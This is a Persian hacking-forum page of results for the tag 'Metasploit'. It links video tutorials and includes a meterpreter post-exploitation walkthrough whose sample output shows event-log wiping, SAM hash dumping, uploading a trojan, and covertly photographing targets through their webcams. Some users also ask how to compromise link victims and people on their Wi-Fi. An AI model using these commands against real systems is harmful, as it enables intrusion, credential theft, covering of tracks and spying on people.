رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'متاسپلویت'.

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
    • بخش خصوصی
    • بخش ویژه - VIP
    • بخش زیر زمینی
  • سوال و جواب های عمومی
    • سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
    • سوال و جواب های امنیت سیستم های شخصی
    • سوال و جواب های برنامه نویسی
    • سوال و جواب های ابزارهای امنیتی
    • سوال و جواب های شبکه
    • سوال و جواب های مدیریت محتوا و وبلاگ ها
    • سوال و جواب های بخش Trojan , Rat , Keylogger
    • سوال و جواب های سیستم عامل ها
    • سوال و جواب های امنیت ایمیل های شخصی
    • سوال و جواب الکترونیک
    • سوال و جواب های موبایل
    • سوال و جواب های متفرقه
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Microtics
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

وبلاگ‌ها

چیزی برای نمایش وجود ندارد


جستجو در...

نمایش نتایجی که شامل...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد...

تاریخ عضویت

  • شروع

    پایان


گروه


About Me

  1. سلام به همه دوستان ببخشید یک سوالی داشتم من وقتی لینک را به تارگت میدم پس از این که تارگت وارد لینک شد آی پی دستگاه را به من نشان می دهد ولی دسترسی به سیستم ندارم و نمیتونم کاری انجام دهم ممنون میشم راهنمایی کنید
  2. درود بر شما دوستان عزیز با آموزشی دیگر در خدمت شما عزیزان هستیم. در این آموزش قصد داریم برخی از دستورات اساسی در متاسپلویت را به شما معرفی کنیم. help را در کنسول تایپ کنید تا لیستی از دستورات اصلی را مشاهده کنید. برای بروزرسانی متاسپلویت از دستور msfupdate کنید. اگر میخواهید چیزی را پیدا کنید یک دستور جست و جوی قدرتمند دارید😄 دستور اطلاعات: دستور اطلاعات مربوط به یک ماژول یا پلتفرم است که آسیب پذیری مرجع و محدودیت محموله را فراهم میکند. با تشکر از شما🌺
  3. در این فیلم آموزشی شمارو با دستورات پایه ای و مهم متاسپلویت Metasploit که برای کامپایل اکسپلویت ( اجرا کردن Exploit ) بکار میره آشنا می کنم و جهت آشنایی دوستانی که با متاسپلویت کار نکردن و آشنایی ندارند باید عرض کنم این دستورات در تمامیه مراحل کار با Metasploit بکارتون میاد و تنظیمات مربوط به ابزارها و اسکنرها و.. در متاسپلویت توسط این دستورات انجام می گیره . فیبم با توضیحات کامل ضبط کردم و حدود 4 دقیقه هست و در این آموزش با مثال عملی پیش میریم تا درک مطالب راحت باشه . پسورد فایل : guardiran.org . Metasploit Command Tutorial.rar
  4. همونطور که میدونید meterpreter یکی از payload های تعاملی و قدرتمند metasploit هستش که از اهمیت مخصوصی برخورداره اینجا ما با تعدادی از دستورات پرکاربرد و عمومیش با یک توضیح مختصر اشنا میشیم و از خروجی دستورات به عنوان مثال اطلاعات کسب میکنیم : HELP این دستور همونطور که از اسمش مشخصه برای دیدن منوی help در meterpreter استفاده میشه : meterpreter > help Core Commands ============= Command Description ------- ----------- ? Help menu background Backgrounds the current session channel Displays information about active channels ...snip... BACKGROUND این دستور برای ارجاع سیشن فعلی به بک گراند استفاده میشه ، و پس از اون دستورات در msf اجرا میشن برای برگشتن به سیشن کافیه دوباره باهاش تعامل برقرار کنید : meterpreter > background msf exploit(ms08_067_netapi) > sessions -i 1 [*] Starting interaction with 1... CAT مثل بش شل لینوکس محتوای فایلی که به عنوان ارگمان بهش داده بشه رو نمایش میده : meterpreter > cat Usage: cat file Example usage: meterpreter > cat edit.txt guardiran digital security team CD and PWD این دو دستور هم باز مثل بش شل برای تغیر مسیر و نمایش ادرس مسیر فعلی در فایل سیستم استفاده میشه : meterpreter > pwd c:\ meterpreter > cd c:\windows meterpreter > pwd c:\windows meterpreter > CLEAREV با استفاده از این دستور در ویندوز لاگ های امنیتی ، سیستمی و اپلیکیشن ها پاکسازی میشن : meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... DOWNLOAD موقع استفاده از دستور دانلود باید نوع سیستم عامل تارگت در نظر گرفته بشه ، به خاطر تفاوت نوع ادرس های فایل سیستم هاشون : meterpreter > download c:\\boot.ini [*] downloading: c:\boot.ini -> c:\boot.ini [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini EDIT با این دستور میتونیم در هاست تارگت یه فایل برای نوشتن باز کنیم : meterpreter > ls Listing: C:\Documents and Settings\Administrator\Desktop ======================================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- . ...snip... . 100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt meterpreter > edit edit.txt EXECUTE با استفاده از این دستور میتونیم در هاست تارگت فایل و کامند اجرا کنیم : meterpreter > execute -f cmd.exe -i -H Process 38320 created. Channel 1 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> GETUID با این دستور یوزری که در هاست تارگت شل رو اجرا میکنه نمایش داده میشه : meterpreter > getuid Server username: NT AUTHORITY\SYSTEM HASHDUMP با این دستور محتوای دیتابیس SAM رو میتونیم دامپ کنیم : meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hashes... Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3::: dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9::: victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d::: IDLETIME این دستور ثانیه هایی که یوزر ریموت روی هاست idle شده رو نمایش میده : meterpreter > idletime User has been idle for: 5 hours 26 mins 35 secs IPCONFIG این دستور اینترفیس و ادرس های سخت افزاری و نرم افزاری ماشین هدف رو نمایش میده : meterpreter > ipconfig MS TCP Loopback interface Hardware MAC: 00:00:00:00:00:00 IP Address : 127.0.0.1 Netmask : 255.0.0.0 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport Hardware MAC: 00:0c:29:10:f5:15 IP Address : 192.168.1.104 Netmask : 255.255.0.0 LPWD and LCD این دستورات جالب همون cd و pwd هستند با این تفاوت که لوکال اجرا میشن ، مثال زیرو ببینید : meterpreter > lpwd /root meterpreter > lcd MSFU meterpreter > lpwd /root/MSFU meterpreter > lcd /var/www meterpreter > lpwd /var/www LS مثل نمونه شل برای لیست کردن فهرست استفاده میشه : meterpreter > ls Listing: C:\Documents and Settings\victim ========================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2019 . 40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2019 .. 100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2019 .recently-used.xbel 40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2019 Application Data ...snip... PS این دستور هم مثل نمونه بش شل برای لیست کردن پروسه ها کاربرد داره : meterpreter > ps Process list ============ PID Name Path --- ---- ---- 132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe 152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 288 snmp.exe C:\WINDOWS\System32\snmp.exe ...snip... SEARCH همونطور که از اسمش مشخصه برای جستجو استفاده میشه ، مثال : meterpreter > search -f autoexec.bat Found 1 result... c:\AUTOEXEC.BAT meterpreter > search -f sea*.bat c:\\xamp\\ Found 1 result... c:\\xampp\perl\bin\search.bat (57035 bytes) SHELL با استفاده از دستور شل ، یک شل استاندارد از ماشین تارگت دریافت میکنیم : meterpreter > shell Process 39640 created. Channel 2 created. Microsoft Windows [Version 5.1.2600] (C) Copyright Microsoft Corp. C:\WINDOWS\system32> UPLOAD موقع استفاده از این دستور هم مثل دستور دانلود باید نوع سیستم عامل تارگت برای جلوگیری از بروز خطا در نظر گرفته بشه ، با توجه به تفاوت ادرس های فایل سیستم هاشون : meterpreter > upload evil_trojan.exe c:\\windows\\system32 [*] uploading : evil_trojan.exe -> c:\windows\system32 [*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe WEBCAM_LIST با استفاده از این دستور یه لیست از وبکم های متصل به تارگت دریافت میکنیم : meterpreter > webcam_list 1: Creative WebCam NX Pro 2: Creative WebCam NX Pro (VFW) WEBCAM_SNAP در این دستور با انتخاب و مشخص کردن وبکمی که با دستور قبل شناسایی کردیم میتونیم با وبکم موردنظر عکس بندازیم ، که با اپشن h- میتونیم از مزایای مختلفش مطلع بشیم : meterpreter > webcam_snap -i 1 -v false [*] Starting... [+] Got frame [*] Stopped Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
  5. سلام من میخام با کالی لینوکس افراد متصل به وای فایمو هک کنم با متاسپلویت تونستم رات بسازم ولی خوب نمیدونم کی وصله و چجوری بش بدم . برای همین اگه راهی هست بهم کمک کنید
  6. با عرض سلام به عزیزان گارد ایران با آمورش نصب متاسپلویت در اوبونتو در خدمت شما هستیم برای نصب متاسپلویت د روش وجود داره ۱-نصب از طریث فایل نصبی که میشه از سایت اصلی دانلود کرد ۲-استفاده از ترمینال و استفاده و کامند ها(برای این کار نیازه که مخازن کالی لینوکس رو در اوبونتو ذخیره سازی کرد,برای اینکار به صورت خودکار میتونید از ابزار کاتولین استفاده کنید که آموزش نصبش قبلا قرار گرفته) خوب ما در این آموزش از ترمینال برای نصب استفاده میکنیم امیدوارم مفید بوده باشه موفق باشید install_metasploit.part1.rar install metasploit.part2.rar
  7. درود در این فیلم آموزشی شما رو با ابزار smb version scanner آشنا میکنم . این ابزای برای به دست آوردن سیستم عامل های در حال اجرا host کاربرد دارد . موفق باشید. پسورد فایل : guardiran.org SMB Version Scanner.rar
  8. kingdeface

    DNS Enumeration Metasploit

    در این فیلم به شما آموزش میدم تا بتونید توسط متاسپلویت , Enumeration DNS را انجام بدین ( جمع آوری اطلاعات از DNS قربانی ) پسورد فایل : guardiran.org Dns_enum Metasploit.rar
×
×
  • ایجاد مورد جدید...